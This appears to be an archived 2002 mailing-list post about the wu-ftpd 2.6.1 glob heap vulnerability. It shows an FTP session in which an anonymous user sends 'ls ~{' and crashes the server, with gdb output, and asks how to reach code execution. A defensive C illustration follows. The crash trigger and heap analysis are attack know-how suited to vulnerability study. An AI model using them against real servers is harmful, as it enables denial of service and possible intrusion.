Fw: wu-ftpd glob vulnerability

From: Federico Romeo (fromeoat_private)
Date: Tue Oct 29 2002 - 04:26:47 PST

  • Next message: Roland Postle: "Re: Fw: wu-ftpd glob vulnerability"

    > Hi !
    > I'm studying the vulnerability of ftp servers and testing the glob heap
    > vulnerability of the wu-ftpd server (version 2.6.1 installed on Linux
    > RedHat 7.2).
    > I tried to attack the server following this technique:
    > I logged in as anonymous user and I sent a lot of 'a's as
    > Password.
    >
    > As you can see this is my computer:
    >
    > ftp> open localhost
    > Connected to localhost (127.0.0.1).
    > 220 sasha FTP server (Version wu-2.6.1-18) ready.
    > Name (localhost:root): anonymous
    > Password: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
    > 230 Guest login ok, access restrictions apply.
    > Remote system type is UNIX.
    > ftp> open localhost
    > Connected to localhost (127.0.0.1).
    > 220 sasha FTP server (Version wu-2.6.1-18) ready.
    > Name (localhost:root): anonymous
    > 331 Guest login ok, send your complete e-mail address as password.
    > Password:
    > Using binary mode to transfer files.
    > ftp> ls ~{
    > 227 Entering Passive Mode (127,0,0,1,241,205)
    > 421 Service not available, remote server has closed connection
    >
    >
    > And this is the debugging section on the attacked machine:
    >
    >  1405 ?        S      0:00 ftpd: accepting connections on port 21
    >  7611 tty3     S      1:29 gdb /usr/sbin/wu.ftpd
    > 26256 ?        S      0:00 ftpd:
    > sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    > 26265 tty3     R      0:00 bash -c ps ax | grep ftpd
    > (gdb) at 26256
    > Attaching to program: /usr/sbin/wu.ftpd, process 26256
    > Symbols already loaded for /lib/libcrypt.so.1
    > Symbols already loaded for /lib/libnsl.so.1
    > Symbols already loaded for /lib/libresolv.so.2
    > Symbols already loaded for /lib/libpam.so.0
    > Symbols already loaded for /lib/libdl.so.2
    > Symbols already loaded for /lib/i686/libc.so.6
    > Symbols already loaded for /lib/ld-linux.so.2
    > Symbols already loaded for /lib/libnss_files.so.2
    > Symbols already loaded for /lib/libnss_nisplus.so.2
    > Symbols already loaded for /lib/libnss_nis.so.2
    > 0x40165544 in __libc_read () from /lib/i686/libc.so.6
    > (gdb) c
    > Continuing.
    > Program received signal SIGSEGV, Segmentation fault.
    > __libc_free (mem=0x4015ad68) at malloc.c:3136
    > 3136    in malloc.c
    > Taking a quick peek at the stack
    >
    > (gdb) info stack
    > #0  __libc_free (mem=0x4015ad68) at malloc.c:3005
    > #1  0x80587c9 in blkfree (av0=0x8086d8c) at glob.c:619
    > #2  0x8056556 in yyparse () at ftpcmd.y:1158
    > #3  0x804bd05 in main (argc=0, argv=0xbffffba4, envp=0xbffffbb0)
    > at ftpd.c:1329
    >
    >
    > (gdb) x 0x8086d8c
    > 0x8086d8c:      0x4015ad68  <- this is where av0 pointed (beginning of
    > the heap!!)
    > (gdb) x 0x8086d8d
    >
    > 0x8086d8d:      0x614015ad
    > (gdb) x 0x8086d8e
    > 0x8086d8e:      0x61614015
    > (gdb) x 0x8086d8f
    > 0x8086d8f:      0x61616140  <- the start of the a's... what pointer mem
    > became, etc.
    >
    > As you can see the parameter passed to the function __libc_free() is
    > 0x4015ad68 stored in 0x8086d8c (blkfree's parameter), and the start
    > of the a's (my password) is 0x8086d8f.
    > I repeated my attack a lot of times (changing the length of the password)
    > and no a's were ever passed to __libc_free()!
    >
    > How is it possible to execute malicious code on the server if I can't pass a
    > particular address to __libc_free()?
    > It seems that the address passed to __libc_free() is always fixed by the
    > system and it's impossible to change it by sending commands to the
    > server.
    >
    > Can you, please, explain to me where the mistakes in my method are?
    >
    
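As an added illustration of what the backtrace in the message shows (blkfree walking a pointer vector and handing its first entry to free), here is a constructed C model. It is not wu-ftpd's code and not part of the original message: a blkfree-style routine beside a vector builder that zero-fills its slots, so that an early error return leaves the first slot NULL instead of stale heap bytes. The names blkfree_model, build_vector and freed_elements, and the sample directory names, are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>

/* Constructed model of a blkfree-style routine: walk a NULL-terminated
 * pointer vector, free each element, then free the vector itself.
 * Returns the number of elements freed so the behaviour can be checked. */
static int blkfree_model(char **av0)
{
    int freed = 0;
    if (av0 == NULL)
        return 0;
    for (char **av = av0; *av != NULL; av++) {
        free(*av);
        freed++;
    }
    free(av0);
    return freed;
}

/* Hardened vector builder (hypothetical, not wu-ftpd's ftpglob): the vector
 * is allocated with calloc so every slot, including the terminator, is NULL
 * before any element is stored. If the builder bails out early (simulated
 * here by fail_early), the caller still receives a well-terminated vector
 * whose first slot is NULL, so blkfree_model() frees nothing rather than
 * whatever bytes happened to sit in an uninitialised slot. */
static char **build_vector(const char *const *parts, size_t n, int fail_early)
{
    char **av = calloc(n + 1, sizeof *av);
    if (av == NULL)
        return NULL;
    if (fail_early)
        return av;                      /* error path: slot 0 is already NULL */
    for (size_t i = 0; i < n; i++) {
        av[i] = strdup(parts[i]);
        if (av[i] == NULL)
            return av;                  /* partial vector, still NULL-terminated */
    }
    return av;
}

/* Drives both paths end to end and reports how many elements were freed
 * (constructed sample names; -1 signals an allocation failure). */
int freed_elements(int fail_early)
{
    const char *const parts[] = { "README", "pub", "incoming" };
    char **av = build_vector(parts, 3, fail_early);
    if (av == NULL)
        return -1;
    return blkfree_model(av);
}

int main(void)
{
    /* Normal path frees three elements; the early-error path frees none. */
    return (freed_elements(0) == 3 && freed_elements(1) == 0) ? 0 : 1;
}
```

The point for anyone reviewing similar code is that the terminator invariant has to hold on every return path, error paths included; a vector whose slot 0 is never written hands free() whatever the allocator left there, which is the kind of value the gdb session above reports as mem=0x4015ad68.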



    This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 15:12:42 PST